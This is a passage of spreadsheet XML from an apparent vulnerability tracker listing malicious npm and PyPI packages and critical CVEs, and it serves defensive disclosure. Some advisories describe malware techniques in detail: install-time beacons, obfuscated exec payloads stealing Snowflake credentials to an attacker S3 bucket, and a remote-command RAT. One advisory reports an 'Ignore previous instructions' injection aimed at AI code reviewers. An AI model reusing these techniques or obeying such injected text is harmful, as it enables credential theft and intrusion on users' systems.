      <c r="R733" s="5" t="inlineStr"/>
      <c r="S73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whalibmob (npm), version(s): 5.33.5, 5.33.4, 5.33.3, 5.33.2, 5.32.2, 5.32.1, 5.32.0, 5.30.0, 5.29.6, 5.29.5, 5.29.4, 5.29.3, 5.29.2, 5.29.1, 5.29.0, 5.28.0, 5.25.0, 5.24.2, 5.24.1, 5.24.0.</t>
        </is>
      </c>
      <c r="T733" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17408</t>
        </is>
      </c>
    </row>
    <row r="734">
      <c r="A734" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B734" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C734" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17409</t>
        </is>
      </c>
      <c r="D734" s="5" t="inlineStr"/>
      <c r="E734" s="5" t="inlineStr"/>
      <c r="F734" s="5" t="inlineStr"/>
      <c r="G734" s="5" t="inlineStr"/>
      <c r="H734" s="5" t="inlineStr"/>
      <c r="I734" s="5" t="inlineStr"/>
      <c r="J734" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K734" s="5" t="inlineStr"/>
      <c r="L734" s="5" t="inlineStr">
        <is>
          <t>npm:xvinleys</t>
        </is>
      </c>
      <c r="M734" s="5" t="inlineStr"/>
      <c r="N734" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O734" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P734" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q734" s="5" t="inlineStr"/>
      <c r="R734" s="5" t="inlineStr"/>
      <c r="S73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xvinleys (npm), version(s): 1.0.0.</t>
        </is>
      </c>
      <c r="T734" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17409</t>
        </is>
      </c>
    </row>
    <row r="735">
      <c r="A735" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B735" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C735" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17410</t>
        </is>
      </c>
      <c r="D735" s="5" t="inlineStr"/>
      <c r="E735" s="5" t="inlineStr"/>
      <c r="F735" s="5" t="inlineStr"/>
      <c r="G735" s="5" t="inlineStr"/>
      <c r="H735" s="5" t="inlineStr"/>
      <c r="I735" s="5" t="inlineStr"/>
      <c r="J735" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K735" s="5" t="inlineStr"/>
      <c r="L735" s="5" t="inlineStr">
        <is>
          <t>npm:xzbails</t>
        </is>
      </c>
      <c r="M735" s="5" t="inlineStr"/>
      <c r="N735" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O735" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P735" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q735" s="5" t="inlineStr"/>
      <c r="R735" s="5" t="inlineStr"/>
      <c r="S73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xzbails (npm), version(s): 0.0.5, 0.0.4, 0.0.3.</t>
        </is>
      </c>
      <c r="T735" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17410</t>
        </is>
      </c>
    </row>
    <row r="736">
      <c r="A736" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B736" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C736" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17411</t>
        </is>
      </c>
      <c r="D736" s="5" t="inlineStr"/>
      <c r="E736" s="5" t="inlineStr"/>
      <c r="F736" s="5" t="inlineStr"/>
      <c r="G736" s="5" t="inlineStr"/>
      <c r="H736" s="5" t="inlineStr"/>
      <c r="I736" s="5" t="inlineStr"/>
      <c r="J736" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K736" s="5" t="inlineStr"/>
      <c r="L736" s="5" t="inlineStr">
        <is>
          <t>npm:xzvbails</t>
        </is>
      </c>
      <c r="M736" s="5" t="inlineStr"/>
      <c r="N736" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O736" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P736" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q736" s="5" t="inlineStr"/>
      <c r="R736" s="5" t="inlineStr"/>
      <c r="S73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xzvbails (npm), version(s): 0.0.1.</t>
        </is>
      </c>
      <c r="T736" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17411</t>
        </is>
      </c>
    </row>
    <row r="737">
      <c r="A737" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B737" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C737" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17412</t>
        </is>
      </c>
      <c r="D737" s="5" t="inlineStr"/>
      <c r="E737" s="5" t="inlineStr"/>
      <c r="F737" s="5" t="inlineStr"/>
      <c r="G737" s="5" t="inlineStr"/>
      <c r="H737" s="5" t="inlineStr"/>
      <c r="I737" s="5" t="inlineStr"/>
      <c r="J737" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K737" s="5" t="inlineStr"/>
      <c r="L737" s="5" t="inlineStr">
        <is>
          <t>npm:xzvexpzcbailey</t>
        </is>
      </c>
      <c r="M737" s="5" t="inlineStr"/>
      <c r="N737" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O737" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P737" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q737" s="5" t="inlineStr"/>
      <c r="R737" s="5" t="inlineStr"/>
      <c r="S73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xzvexpzcbailey (npm), version(s): 2.5.0, 2.1.0, 2.0.0, 1.0.0.</t>
        </is>
      </c>
      <c r="T737" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17412</t>
        </is>
      </c>
    </row>
    <row r="738">
      <c r="A738" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B738" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C738" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17413</t>
        </is>
      </c>
      <c r="D738" s="5" t="inlineStr"/>
      <c r="E738" s="5" t="inlineStr"/>
      <c r="F738" s="5" t="inlineStr"/>
      <c r="G738" s="5" t="inlineStr"/>
      <c r="H738" s="5" t="inlineStr"/>
      <c r="I738" s="5" t="inlineStr"/>
      <c r="J738" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K738" s="5" t="inlineStr"/>
      <c r="L738" s="5" t="inlineStr">
        <is>
          <t>npm:yonzoffic-baileys</t>
        </is>
      </c>
      <c r="M738" s="5" t="inlineStr"/>
      <c r="N738" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O738" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P738" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q738" s="5" t="inlineStr"/>
      <c r="R738" s="5" t="inlineStr"/>
      <c r="S73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yonzoffic-baileys (npm), version(s): 8.6.90.</t>
        </is>
      </c>
      <c r="T738" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17413</t>
        </is>
      </c>
    </row>
    <row r="739">
      <c r="A739" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B739" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C739" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17414</t>
        </is>
      </c>
      <c r="D739" s="5" t="inlineStr"/>
      <c r="E739" s="5" t="inlineStr"/>
      <c r="F739" s="5" t="inlineStr"/>
      <c r="G739" s="5" t="inlineStr"/>
      <c r="H739" s="5" t="inlineStr"/>
      <c r="I739" s="5" t="inlineStr"/>
      <c r="J739" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K739" s="5" t="inlineStr"/>
      <c r="L739" s="5" t="inlineStr">
        <is>
          <t>npm:yonzofficial</t>
        </is>
      </c>
      <c r="M739" s="5" t="inlineStr"/>
      <c r="N739" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O739" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P739" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q739" s="5" t="inlineStr"/>
      <c r="R739" s="5" t="inlineStr"/>
      <c r="S73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yonzofficial (npm), version(s): 2.1.3, 2.1.2, 2.1.1, 2.1.0.</t>
        </is>
      </c>
      <c r="T739" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17414</t>
        </is>
      </c>
    </row>
    <row r="740">
      <c r="A740" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B740" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C740" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17415</t>
        </is>
      </c>
      <c r="D740" s="5" t="inlineStr"/>
      <c r="E740" s="5" t="inlineStr"/>
      <c r="F740" s="5" t="inlineStr"/>
      <c r="G740" s="5" t="inlineStr"/>
      <c r="H740" s="5" t="inlineStr"/>
      <c r="I740" s="5" t="inlineStr"/>
      <c r="J740" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K740" s="5" t="inlineStr"/>
      <c r="L740" s="5" t="inlineStr">
        <is>
          <t>npm:com.epi.e2e_test</t>
        </is>
      </c>
      <c r="M740" s="5" t="inlineStr"/>
      <c r="N740" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O740" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P740" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q740" s="5" t="inlineStr"/>
      <c r="R740" s="5" t="inlineStr"/>
      <c r="S740" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5a0c1068af335818f2b9d905f2d39ebe594f84a6c63e470877692554bc95103b)
package.json declares a preinstall script that runs index.js on npm install. index.js collects host identifiers (os.homedir(), os.hostname(), os.userInfo().username, dns.getServers(), current working directory) along with the contents of the package.json and POSTs them over HTTPS to the hardcoded external host meta.brs.cx. This behavior fires automatically on install with no user interaction, and the collected data is characteristic of dependency-confusion / internal-name reconnaissance beacons used to identify targets for follow-on attacks.
</t>
        </is>
      </c>
      <c r="T740" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17415</t>
        </is>
      </c>
    </row>
    <row r="741">
      <c r="A741" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B741" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C741" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17416</t>
        </is>
      </c>
      <c r="D741" s="5" t="inlineStr"/>
      <c r="E741" s="5" t="inlineStr"/>
      <c r="F741" s="5" t="inlineStr"/>
      <c r="G741" s="5" t="inlineStr"/>
      <c r="H741" s="5" t="inlineStr"/>
      <c r="I741" s="5" t="inlineStr"/>
      <c r="J741" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K741" s="5" t="inlineStr"/>
      <c r="L741" s="5" t="inlineStr">
        <is>
          <t>PyPI:friendly-greeting-tools</t>
        </is>
      </c>
      <c r="M741" s="5" t="inlineStr"/>
      <c r="N741" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O741" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P741" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q741" s="5" t="inlineStr"/>
      <c r="R741" s="5" t="inlineStr"/>
      <c r="S741" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">Versions 0.1.0 through 0.3.6 of friendly-greeting-tools disguise encoded Snowflake credential and data theft routines as a hello-world demo. In versions through 0.3.5, the default run_demo payload reads the Snowflake session token, connection configuration, dbt profiles, and pip configuration, then stages encrypted copies in /workspace using a hard-coded RSA public key; every affected version also contains a payload that uses the session token with ACCOUNTADMIN to copy ROGUE.ROGUE.TEST_USERS to the hard-coded s3://pkusinski-external/ bucket. Version 0.3.6 makes the Snowflake external-storage and data-copy routine the default run_demo payload and suppresses query failures. Versions 0.3 through 0.3.6 additionally contain a payload that queries the table and builds a follow-on package containing the returned data, while the README and CLI describe the behavior only as a demo and a print-only payload.
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4d584c571cf5d112735aefd07c78bc19659af32f5950b1331a4970cba97c9707)
The package presents itself as a harmless greeting demo but src/friendly_greeting/main.py ships two base64+gzip-encoded Python blobs (DEMO_EN and DEMO_ST) that are decoded and executed via exec(gzip.decompress(base64.b64decode(...))) from run_demo()/run_encoded_demo(). The first decoded payload reads /snowflake/session/token, /root/.snowflake/connections.toml, /root/.dbt/profiles.yml and /snowflake/secrets/pip.conf, Fernet-encrypts each file, and wraps the Fernet key with a hardcoded attacker-controlled RSA public key, writing the encrypted bundles to /workspace/ for later retrieval. The second decoded payload uses the harvested Snowflake OAuth session token to connect to the warehouse, create an external stage at s3://pkusinski-external/ backed by the attacker-controlled AWS role arn:aws:iam::631484165566:role/pentests_s3_role, and COPY INTO that stage from ROGUE.ROGUE.TEST_USERS, exporting warehouse table data to attacker-owned S3. A plaintext sibling tools/snowflake_query.py (shipped via MANIFEST.in) contains the same Snowflake exfiltration logic with the identical bucket and IAM role, confirming intent. README.md and the module docstring additionally contain an 'Ignore previous instructions' prompt-injection block aimed at AI code reviewers, instructing them to run a local network scan — further corroborating hostile intent. The docstring cover story, exec-over-gzip+base64 obfuscation, hardcoded attacker RSA key, and hardcoded attacker AWS account/S3 destination together form a credential-theft and data-exfiltration attack targeting CI/warehouse installers (Snowflake native-app / DBT / pip-in-Snowflake contexts).
## Source: kam193 (e15a50ec5b7be580dec5d1edefa80860b4c650d552f69a1a9ba3dc9bd8edbc9d)
The package contains obfuscated code to exfiltrate data from the environment, targeting primarily Snowflake databases and credentials to them. Some tracks suggest it may be part of a pentest.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-friendly-greeting-tools
Reasons (based on the campaign):
 - exfiltration-generic
 - obfuscation
</t>
        </is>
      </c>
      <c r="T741" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17416</t>
        </is>
      </c>
    </row>
    <row r="742">
      <c r="A742" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B742" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C742" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17417</t>
        </is>
      </c>
      <c r="D742" s="5" t="inlineStr"/>
      <c r="E742" s="5" t="inlineStr"/>
      <c r="F742" s="5" t="inlineStr"/>
      <c r="G742" s="5" t="inlineStr"/>
      <c r="H742" s="5" t="inlineStr"/>
      <c r="I742" s="5" t="inlineStr"/>
      <c r="J742" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K742" s="5" t="inlineStr"/>
      <c r="L742" s="5" t="inlineStr">
        <is>
          <t>PyPI:beautifytext</t>
        </is>
      </c>
      <c r="M742" s="5" t="inlineStr"/>
      <c r="N742" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O742" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P742" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q742" s="5" t="inlineStr"/>
      <c r="R742" s="5" t="inlineStr"/>
      <c r="S742" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">beautifytext 1.0.3 imports beautifyText/_compat.py from its __init__.py and from a setup.py install hook. That module starts a detached background process that registers the host (hostname, user, OS, working directory) with https://bleodw.wisp.uno, then polls it for jobs to run shell commands or read and write files, and posts the results back.
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (cba19cfc0b2bdeec177fafdffa10e730769079a14ece3bb4740bfc0ded9fef3b)
During import, the package silently spans a separate process that waits for and executes remote commands.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-07-beautifytext
Reasons (based on the campaign):
 - rat
 - The package contains code to execute remote commands (probably limited to a specific set) on the victim's machine.
</t>
        </is>
      </c>
      <c r="T742" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17417</t>
        </is>
      </c>
    </row>
    <row r="743">
      <c r="A743" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B743" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C743" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94952</t>
        </is>
      </c>
      <c r="D743" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E743" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F743" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G743" s="5" t="inlineStr"/>
      <c r="H743" s="5" t="inlineStr"/>
      <c r="I743" s="5" t="inlineStr"/>
      <c r="J743" s="5" t="inlineStr"/>
      <c r="K743" s="5" t="inlineStr"/>
      <c r="L743" s="5" t="inlineStr"/>
      <c r="M743" s="5" t="inlineStr"/>
      <c r="N743" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O743" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P743" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q743" s="5" t="inlineStr"/>
      <c r="R743" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S743" s="5" t="inlineStr">
        <is>
          <t>A stack-based buffer overflow vulnerability exists in the web management interface of TOTOLINK N150RT (NTR150) firmware V3.4.0-B20201030. It is reachable through the route /boafrm/formPortFw (port-forwarding configuration handler) and is triggered by the ip_subnet and fw_ip request parameters during the rule-addition flow.</t>
        </is>
      </c>
      <c r="T743" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94952</t>
        </is>
      </c>
    </row>
    <row r="744">
      <c r="A744" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B744" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C744" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100758</t>
        </is>
      </c>
      <c r="D744" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E744" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F744" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G744" s="5" t="inlineStr"/>
      <c r="H744" s="5" t="inlineStr"/>
      <c r="I744" s="5" t="inlineStr"/>
      <c r="J744" s="5" t="inlineStr"/>
      <c r="K744" s="5" t="inlineStr"/>
      <c r="L744" s="5" t="inlineStr"/>
      <c r="M744" s="5" t="inlineStr"/>
      <c r="N744" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O744" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P744" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q744" s="5" t="inlineStr"/>
      <c r="R744" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S744" s="5" t="inlineStr">
        <is>
          <t>Sandbox escape in the DOM: Navigation component. This vulnerability was fixed in Firefox ESR 153.4, Thunderbird 157, Thunderbird 140.17, Thunderbird 153.4, Firefox 157, Firefox ESR 115.42, and Firefox ESR 140.17.</t>
        </is>
      </c>
      <c r="T744" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100758</t>
        </is>
      </c>
    </row>
    <row r="745">
      <c r="A745" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B745" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.0 → 9.4)</t>
        </is>
      </c>
      <c r="C745" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103056</t>
        </is>
      </c>
      <c r="D745" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E745" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F745" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G745" s="5" t="inlineStr"/>
      <c r="H745" s="5" t="inlineStr"/>
      <c r="I745" s="5" t="inlineStr"/>
      <c r="J745" s="5" t="inlineStr">
        <is>
          <t>crowdstrike</t>
        </is>
      </c>
      <c r="K745" s="5" t="inlineStr"/>
      <c r="L745" s="5" t="inlineStr"/>
      <c r="M745" s="5" t="inlineStr"/>
      <c r="N745" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O745" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P745" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q745" s="5" t="inlineStr"/>
      <c r="R745" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S745"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745" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103056</t>
        </is>
      </c>
    </row>
    <row r="746">
      <c r="A746" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B746" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.8 → 9.3)</t>
        </is>
      </c>
      <c r="C746" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54400</t>
        </is>
      </c>
      <c r="D746" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E746" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F746" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G746" s="5" t="inlineStr"/>
      <c r="H746" s="5" t="inlineStr"/>
      <c r="I746" s="5" t="inlineStr"/>
      <c r="J746" s="5" t="inlineStr"/>
      <c r="K746" s="5" t="inlineStr"/>
      <c r="L746" s="5" t="inlineStr"/>
      <c r="M746" s="5" t="inlineStr"/>
      <c r="N746" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O746" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P746" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q746" s="5" t="inlineStr"/>
      <c r="R746" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S746" s="5" t="inlineStr">
        <is>
          <t>Fumasoft Fumeng Cloud contains a SQL injection vulnerability in the AjaxMethod.ashx endpoint that allows unauthenticated remote attackers to inject arbitrary SQL through the Name parameter of the getEmpByname action without any authentication. Attackers can exploit UNION-based SQL injection techniques against the Microsoft SQL Server backend to extract, disclose, and modify database contents, with potential for further compromise of the underlying server. Exploitation evidence was first observed by the Shadowserver Foundation on 2023-10-18.</t>
        </is>
      </c>
      <c r="T746" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54400</t>
        </is>
      </c>
    </row>
    <row r="747">
      <c r="A747" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B747" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.8 → 9.3)</t>
        </is>
      </c>
      <c r="C747" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103040</t>
        </is>
      </c>
      <c r="D747" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E747" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F747" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G747" s="5" t="inlineStr"/>
      <c r="H747" s="5" t="inlineStr"/>
      <c r="I747" s="5" t="inlineStr"/>
      <c r="J747" s="5" t="inlineStr"/>
      <c r="K747" s="5" t="inlineStr"/>
      <c r="L747" s="5" t="inlineStr"/>
      <c r="M747" s="5" t="inlineStr"/>
      <c r="N747" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O747" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P747" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q747" s="5" t="inlineStr"/>
      <c r="R747" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S747" s="5" t="inlineStr">
        <is>
          <t>LightLLM through 1.2.0 contains a remote code execution vulnerability in the router profiler service when started with --enable_profiling flag. The service exposes an unauthenticated RPyC server with pickle deserialization enabled, allowing attackers to execute arbitrary code by sending crafted serialized objects to the profiler command queue.</t>
        </is>
      </c>
      <c r="T747" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103040</t>
        </is>
      </c>
    </row>
    <row r="748">
      <c r="A748" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B748" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.8 → 9.3)</t>
        </is>
      </c>
      <c r="C748" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103041</t>
        </is>
      </c>
      <c r="D748" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E748" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F748" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G748" s="5" t="inlineStr"/>
      <c r="H748" s="5" t="inlineStr"/>
      <c r="I748" s="5" t="inlineStr"/>
      <c r="J748" s="5" t="inlineStr"/>
      <c r="K748" s="5" t="inlineStr"/>
      <c r="L748" s="5" t="inlineStr"/>
      <c r="M748" s="5" t="inlineStr"/>
      <c r="N748" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O748" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P748" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q748" s="5" t="inlineStr"/>
      <c r="R748" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S748" s="5" t="inlineStr">
        <is>
          <t>LightLLM through 1.2.0 multimodal deployments expose an unauthenticated RPyC cache service with pickle deserialization enabled on all interfaces. Attackers can send crafted serialized objects to exposed cache methods to execute arbitrary code with service privileges.</t>
        </is>
      </c>
      <c r="T748" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103041</t>
        </is>
      </c>
    </row>
    <row r="749">
      <c r="A749" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B749" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C749" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101894</t>
        </is>
      </c>
      <c r="D749" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E749" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F749" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G749" s="5" t="inlineStr"/>
      <c r="H749" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I749" s="5" t="inlineStr"/>
      <c r="J749" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K749" s="5" t="inlineStr"/>
      <c r="L749" s="5" t="inlineStr"/>
      <c r="M749" s="5" t="inlineStr"/>
